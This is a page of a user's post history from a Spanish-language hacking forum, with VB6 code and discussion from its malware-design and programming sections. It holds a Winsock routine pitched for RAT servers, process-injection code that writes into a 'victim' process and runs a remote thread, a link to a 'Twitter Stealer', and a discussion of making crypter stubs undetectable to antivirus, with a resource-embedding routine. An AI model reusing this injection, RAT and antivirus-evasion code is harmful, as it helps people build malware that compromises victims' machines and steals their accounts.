|
Mostrar Mensajes
|
Páginas: 1 2 3 4 [5]
|
41
|
Programación / Programación Visual Basic / [SRC] Sockets - VB6
|
en: 15 Julio 2010, 06:30 am
|
Socket:Option Explicit
Private Declare Function socket Lib "WSOCK32" (ByVal af As Long, ByVal s_type As Long, ByVal protocol As Long) As Long Private Declare Function closesocket Lib "WSOCK32" (ByVal s As Long) As Long Private Declare Function connect Lib "WSOCK32" (ByVal s As Long, addr As SOCKADDR, ByVal NameLen As Long) As Long Private Declare Function send Lib "WSOCK32" (ByVal s As Long, Buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long Private Declare Function recv Lib "WSOCK32" (ByVal s As Long, Buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long Public Declare Function inet_addr Lib "WSOCK32" (ByVal cp As String) As Long Private Declare Function WSAStartup Lib "WSOCK32" (ByVal wVR As Long, lpWSAD As Long) As Long Private Declare Function WSACleanup Lib "WSOCK32" () As Long Private Declare Function WSAAsyncSelect Lib "WSOCK32" (ByVal s As Long, ByVal hWnd As Long, ByVal wMsg As Long, ByVal lEvent As Long) As Long
Private Declare Function CreateWindowExA Lib "USER32" (ByVal dwExStyle As Long, ByVal lpClassName As String, ByVal lpWindowName As String, ByVal dwStyle As Long, ByVal x As Long, ByVal y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal hWndParent As Long, ByVal hMenu As Long, ByVal hInstance As Long, lpParam As Any) As Long Private Declare Function RegisterClassExA Lib "USER32" (pcWndClassEx As WNDCLASSEX) As Integer Private Declare Function DefWindowProcA Lib "USER32" (ByVal hWnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Type WNDCLASSEX cbSize As Long style As Long lpfnWndProc As Long cbClsExtra As Long cbWndExtra As Long hInstance As Long hIcon As Long hCursor As Long hbrBackground As Long lpszMenuName As String lpszClassName As String hIconSm As Long End Type
Private Type SOCKADDR sin_family As Integer sin_port As Integer sin_addr As Long sin_zero As String * 8 End Type
Private Const AF_INET = 2 Private Const PF_INET = 2 Private Const FD_READ = &H1& Private Const FD_WRITE = &H2& Private Const FD_CONNECT = &H10& Private Const FD_CLOSE = &H20& Private Const SOCK_STREAM = 1 Private Const IPPROTO_TCP = 6 Private Const WINSOCK_MESSAGE = 1025
Private wHwnd As Long
Public Function htons(ByVal lPort As Long) As Integer htons = ((((lPort And &HFF000000) \ &H1000000) And &HFF&) Or ((lPort And &HFF0000) \ &H100&) Or ((lPort And &HFF00&) * &H100&) Or ((lPort And &H7F&) * &H1000000) Or (IIf((lPort And &H80&), &H80000000, &H0)) And &HFFFF0000) \ &H10000 End Function
'-------- Public Function ProcessMessage(ByVal hWnd As Long, ByVal lMessage As Long, ByVal wParam As Long, ByVal lParam As Long) As Long If lMessage = WINSOCK_MESSAGE Then Dim bBuffer(1 To 1024) As Byte Select Case lParam Case FD_CONNECT: Call WsSendData(wParam, StrConv("AAAAAAAAAA", vbFromUnicode)) Case FD_WRITE: Case FD_READ: Call recv(wParam, bBuffer(1), 1024, 0) MsgBox StrConv(bBuffer, vbUnicode) Case FD_CLOSE: 'Jmp connect Routine End Select Exit Function End If ProcessMessage = DefWindowProcA(hWnd, lMessage, wParam, lParam) End Function '--------
Public Function WsInitialize(ByVal MyWndProc As Long, ByVal szSocketName As String) As Boolean Dim WNDC As WNDCLASSEX If wHwnd = 0 Then WNDC.cbSize = LenB(WNDC) WNDC.lpfnWndProc = MyWndProc WNDC.hInstance = App.hInstance WNDC.lpszClassName = szSocketName Call RegisterClassExA(WNDC) '0: Exit Function wHwnd = CreateWindowExA(0&, szSocketName, "", 0&, 0&, 0&, 0&, 0&, 0&, 0&, App.hInstance, 0&) '0: Call UnregisterClass(szSocketName, App.hInstance) End If Call WSAStartup(&H101, 0&) Initialize = True End Function Public Sub WsTerminate() Call WSACleanup End Sub
Public Function WsConnect(lRemoteHost As String, lPort As Long) As Long Dim SockData As SOCKADDR Dim hSocket As Long Dim lWsMsg As Long SockData.sin_family = AF_INET SockData.sin_port = htons(lPort) 'If sockdata.sin_port = INVALID_SOCKET Then Exit Function SockData.sin_addr = inet_addr(lRemoteHost) 'If sockdata.sin_addr = INADDR_NONE Then Exit Function hSocket = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP) 'If hSocket < 0 Then Exit Function
Call connect(hSocket, SockData, 16) ' If hSocket Then WsClose Exit Function If WSAAsyncSelect(hSocket, wHwnd, ByVal WINSOCK_MESSAGE, ByVal FD_READ Or FD_WRITE Or FD_CONNECT Or FD_CLOSE) Then lWsMsg = FD_CLOSE Else lWsMsg = FD_CONNECT End If Call ProcessMessage(0, WINSOCK_MESSAGE, hSocket, FD_CONNECT): WsConnect = hSocket End Function Public Function WsSendData(ByVal SocketIndex As Long, bMessage() As Byte) As Long If UBound(bMessage) > -1 Then WsSendData = send(SocketIndex, bMessage(0), (UBound(bMessage) - LBound(bMessage) + 1), 0) End If End Function Call: Private Sub Main() If WsInitialize(AddressOf ProcessMessage, "Server") Then If WsConnect("127.0.0.1", 7777) Then Do DoEvents Loop End If End If End Sub No tiene mucha ciencia, es algo tiny de lo que se usa normalmente OCX, SocketPlus, SocketMaster, etc... Sirve para enviar/recibir data solamente, perfecto para servidores de rats y demas apps... La funcion ProcessMessage es la cual procesa los mensajes, y deberan modificarla segun su APP. Estoy seguro que se puede limpiar mas aún, eliminando la ***** de crear una Clase y una Ventana, pero no se me ocurre su remplaz mas prolijo La funcion htons es de Karcrack.Ah Karcrack, estoy seguro que podrias hacer un remplazo para inet_addr@WSOCK32.DLL, yo intente, pero no entendi la logica de lo que hace esa hermosa API Espero que les sea util el codigo, Saludos, y Felicidades por la Copa a la gente de España desde Uruguay
|
|
|
42
|
Seguridad Informática / Análisis y Diseño de Malware / Re: [SRC] Twitter Stealer
|
en: 15 Julio 2010, 06:09 am
|
jaja si se puede mejorar mucho la parte de plugins, si hago v2 de esto incluire el sistema de plugins del rat que creo que nunca terminare x falta de ganas Lo de las DLL en VB6 no me gusta mucho por el momento, por el simple echo de la forma que son ejecutadas luego de ser inyectadas... Amaría ver un Code en VB6 que llame al DllSubMain de una libreria mediante un CallWindowProcW Remoto ... Pero no lo logre hacer y no veo SRC en la net como llamar un API en un proceso remoto pasandole 2 o + parametros usando CreateRemoteThread... Encontre lo mismo en c/c++ pero soy tan noobie que no logro VB6izarlo http://www.rohitab.com/discuss/index.php?showtopic=31453Estaria muy bueno que alguien lograra escribirlo en VB6 y que lo comparta Salu2
|
|
|
43
|
Seguridad Informática / Análisis y Diseño de Malware / [SRC] Twitter Stealer
|
en: 13 Julio 2010, 19:26 pm
|
Buenas! Hice esto hace mucho y lo deje por ahi, como no sirve para nada guardado en mi HD, lo publico, quizas le dé mejor utilidad alguno de ustedes =). Como podran ver es a base de plugins, no hice ningun funcional, pero está el plugin de ejemplo, asi ven la forma en que hay q entregar los datos para que el cliente ordene todo correctamente =) El codigo es bastante simple de entender, espero que les sirva de algo y bueno nada mas que decir, Salu2! http://www.box.net/shared/o2cod7gqjf
|
|
|
45
|
Programación / Programación Visual Basic / Problema pasando parametros a llamada remota :P
|
en: 9 Junio 2010, 05:47 am
|
Hola gente del mundo Probablemente muchos no me conozcan ya que soy el indito uruguayo Se que no participo en el foro, y no deberia estar pidiendo ayuda, pero estoy trabajando en algo y el señor Karcrack quien me daba una mano cuando tenia problemillas siempre aparecia con la solucion pero anda muy ocupado , asi que vengo a pedirles ayuda con este pequeño code que hice a partir de un sc de inyeccion de una libreria en un proceso remoto en C. El cual intenta llamar un api remota, lo cual funciona, pero el problema esta al pasarle los parametros, ojeando los CallApiByName que andan por la net, trate de hacerlo pero FAIL FAIL juaz Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Long, ByVal bInheritHandle As Long, ByVal dwProcessId As Long) As Long Private Declare Function GetModuleHandle Lib "kernel32" Alias "GetModuleHandleA" (ByVal lpModuleName As String) As Long Private Declare Function GetProcAddress Lib "kernel32" (ByVal hModule As Long, ByVal lpProcName As String) As Long
Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, lpBaseAddress As Any, lpBuffer As Any, ByVal nSize As Long, lpNumberOfBytesWritten As Long) As Long Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long Private Declare Function VirtualFreeEx Lib "kernel32" (ByVal hProcess As Long, lpAddress As Any, ByVal dwSize As Long, ByVal dwFreeType As Long) As Long
Private Declare Function CreateRemoteThread Lib "kernel32" (ByVal hProcess As Long, lpThreadAttributes As Any, ByVal dwStackSize As Long, lpStartAddress As Long, lpParameter As Any, ByVal dwCreationFlags As Long, lpThreadId As Long) As Long Private Declare Function WaitForSingleObject Lib "kernel32" (ByVal hHandle As Long, ByVal dwMilliseconds As Long) As Long Private Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long
Private Const PROCESS_ALL_ACCESS = &H1F0FFF Private Const MEM_COMMIT = &H1000 Private Const MEM_RELEASE = &H8000 Private Const PAGE_READWRITE = &H4 Private Const INFINITE = &HFFFFFFFF
Public Function ExecuteDll(lPid As Long) As Boolean Dim hVictim As Long Dim hInject As Long Dim lParamAddress As Long Dim lStartAddress As Long Dim bB() As Byte Dim sTmp As String
hVictim = OpenProcess(PROCESS_ALL_ACCESS, 0, lPid): If hVictim = 0 Then Exit Function If hVictim = 0 Then: GoTo Error '=== sTmp = "68" & GetLng(0) & _ "68" & GetLng(StrPtr("HOLA")) & _ "68" & GetLng(StrPtr("HOLA")) & _ "68" & GetLng(0) & "68"
Call PutThunk(sTmp, bB) '=== lStartAddress = GetProcAddress(GetModuleHandle("USER32"), "MessageBoxA"): If lStartAddress = 0 Then GoTo Error lParamAddress = VirtualAllocEx(hVictim, 0&, UBound(bB) + 1, MEM_COMMIT, PAGE_READWRITE): If lParamAddress = 0 Then GoTo Error Call WriteProcessMemory(hVictim, lParamAddress, ByVal VarPtr(bB(0)), UBound(bB) + 1, ByVal 0&) '=== hInject = CreateRemoteThread(hVictim, ByVal 0&, 0&, ByVal lStartAddress, lParamAddress, 0, ByVal 0&) If hInject = 0 Then: GoTo Error '===
Call WaitForSingleObject(hInject, INFINITE) Call CloseHandle(hVictim) Call CloseHandle(hInject)
ExecuteDll = True Exit Function
Error: Call CloseHandle(hInject) Call CloseHandle(hVictim)
ExecuteDll = False End Function
Private Function GetLng(ByVal lLng As Long) As String Dim lTMP As Long
lTMP = (((lLng And &HFF000000) &H1000000) And &HFF&) Or ((lLng And &HFF0000) &H100&) Or ((lLng And &HFF00&) * &H100&) Or ((lLng And &H7F&) * &H1000000) ' by Mike D Sutton If (lLng And &H80&) Then lTMP = lTMP Or &H80000000
GetLng = String$(8 - Len(Hex$(lTMP)), "0") & Hex$(lTMP) End Function
Private Sub PutThunk(ByVal sThunk As String, ByRef bvRet() As Byte) Dim i As Long
ReDim bvRet(0)
For i = 0 To Len(sThunk) - 1 Step 2 bvRet(i / 2) = CByte("&H" & Mid$(sThunk, i + 1, 2)) ReDim Preserve bvRet(UBound(bvRet) + 1) Next i
ReDim Preserve bvRet(UBound(bvRet) - 1) End Sub
Sub Main() ExecuteDll 7756, 0 End Sub Espero que alguno tenga un tiempito en corregir la parte de los paramentros en el sc, ya que pienso pero no puedo solucionarlo, y estoy trabajando en algo muy interesante y me gustaria poder concretarlo, y para eso necesito esto working Gracias y saludos desde el pequeño uruguay a todos los coderz que andan por ahi
|
|
|
46
|
Programación / Programación Visual Basic / Re: Generic Sever Editor Class [SRC]
|
en: 13 Julio 2009, 17:28 pm
|
Entonces es como digo, el propertybag no tiene nada que ver con AV, el tema es que el stub y el metodo de encripcion no son FUD.
El problema no es del metodo de encriptacion ni del stub, al menos con avira. Estuve haciendo un par de pruebas, y avira detecta si o si un archivo, si este tiene eof en gran cantidad. Al hacerlo con textos "cortos" (ej: "aaaaaaaaaaaaaa") no hay problema, pero si lo hay cuando se agregan textos "largos" (ej: string(20000, "b")) Lo mismo sucede con el "metodo" recursos: Option Explicit
Private Declare Function BeginUpdateResource Lib "kernel32" Alias "BeginUpdateResourceA" (ByVal pFileName As String, ByVal bDeleteExistingResources As Long) As Long Private Declare Function UpdateResource Lib "kernel32" Alias "UpdateResourceA" (ByVal hUpdate As Long, ByVal lpType As String, ByVal lpName As Long, ByVal wLanguage As Long, lpData As Any, ByVal cbData As Long) As Long Private Declare Function EndUpdateResource Lib "kernel32" Alias "EndUpdateResourceA" (ByVal hUpdate As Long, ByVal fDiscard As Long) As Long
Private Function AgregarRecurso(Ruta As String, Datos As String) Dim hRes As Long, i As Integer Dim myStr() As Byte, b() As Byte
myStr = StrConv(Datos, vbFromUnicode) hRes = BeginUpdateResource(Ruta, False) UpdateResource hRes, "CUSTOM", 101, 0, myStr(0), Len(Datos) EndUpdateResource hRes, False
End Function
Prueben: Call AgregarRecurso("c:\ss.exe", string(20000, "b")) y veran que tambien es detectado como Dropper. ============= Exluyendo ese problemita, es exelente aporte , al menos a mi me sirve bastante para no tener que estar utilizando el metodo "Append" que te hace escribir de mas, a diferencia de este que es muy comodo. pd: Perdon x revivir el tema Saludos
|
|
|
|
|
|
|